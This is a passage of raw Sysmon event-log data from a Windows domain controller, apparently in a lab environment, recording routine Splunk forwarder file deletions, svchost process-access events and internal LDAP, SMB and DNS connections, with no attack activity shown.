23542300x80000000000000002201482Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.151{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E889135DA787354EED672526DC197D3,SHA256=36214A194399F17498F93BFEE4739A91EAA42514174C5B10D1001C29A23CB1DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201481Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.011{5ABCFE62-E7A6-6040-034E-00000000AD01}13366264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201494Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:04.511{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5379DED1ABD305001D20402942B3F437,SHA256=CB28053AF24805880C444D54344AD4664F54613813DAAEA11AB9E0DA1CBC4DC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201493Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:04.167{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAA8C5D10D3BB7C46FC96329825CDD76,SHA256=9777AD075615658CFA9B7D62CA614CB94AB2B2B8D459347C74A8ECE2E1169E7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201501Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.459{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55222-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002201500Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.459{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55222-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002201499Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.356{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-228.attackrange.local55221-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002201498Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.355{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55221-false10.0.1.14win-dc-228.attackrange.local389ldap 354300x80000000000000002201497Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.349{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55220-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002201496Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.349{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local55220-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002201495Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:05.183{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4615E90081D2581CC1DD32169FCBD7F4,SHA256=A1D28B5EE57C6D8B7FBF5431581017A93DD0944571890EC810BED4171D045F26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201504Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:06.823{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201503Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.956{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55223-false10.0.1.12-8000- 23542300x80000000000000002201502Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:06.183{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8C016505A965370CBED90F79160B6A0,SHA256=68473F016CB1E5A730C54379F2F4E6BCA238E13FCE70BE307BAE428599C82C90,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201507Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:04.159{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58699- 23542300x80000000000000002201506Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:07.323{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50460400D4232BF51AEEDFC332E89868,SHA256=9C7E44381B2BC7498D5375EBCF4AC0786B1D16FB143C136D297DB11ABA01D44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201505Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:07.198{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65002981761D4C4EFFDACA9E1F3DFC28,SHA256=BB88039DDEDC84C8E757CD3B804D2E70E3D1F8FC9461C5380300CDDD37BB32BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201511Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:05.159{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58699- 354300x80000000000000002201510Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:04.644{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55224-false10.0.1.12-8089- 23542300x80000000000000002201509Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:08.324{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F81CA20D1698A1533C80FACFE963569,SHA256=C90BB0339CCA46951AFEB36A9A20CF432ABF369355CFA40A970D898C24132EAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201508Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:08.231{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA451135B6D270302CAF363D12E7911E,SHA256=3554C355D9D25AA3C673CFCDE1F1732F6FD871D9C994BF2D04F1D3B7F7BB0308,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201512Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:09.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=178610C2ED7A4E7F1B9E013308D88235,SHA256=B3256AC5476F30164535D9F04FA912A46E4CBB94B6E84266F00BA19CC7BBDDE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201515Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:06.958{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55225-false10.0.1.12-8000- 23542300x80000000000000002201514Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:10.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF8F173900EE57D3D2A9952C546541C2,SHA256=842EB19ADB7796B0C764A5237BE96583463C6655B86D12284B3B95402F3FF28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201513Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:10.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9746E2FDD09222F51BD9211378BFBC0C,SHA256=584676D701233956D83CC73DBC42426D8DF642CD984D39CF13D39A10B0F74CEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201550Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C94B455A5E2ADF35A57455CA5B070D6,SHA256=4CC5784D0D4D7E09472A8DE5737A38035C385A861C784FA174B72A95B43C40E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201549Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DDFE21D020F53F6193894EBFA69FEA5,SHA256=45302B74A5302ED6AD5CF2FA52387B104E9032F1E8C01FAAD35D5227FB9018C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201548Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201547Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201546Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201545Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201544Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201543Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201542Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201541Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201540Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201539Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201538Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201537Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201536Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201535Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201534Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201533Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201532Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 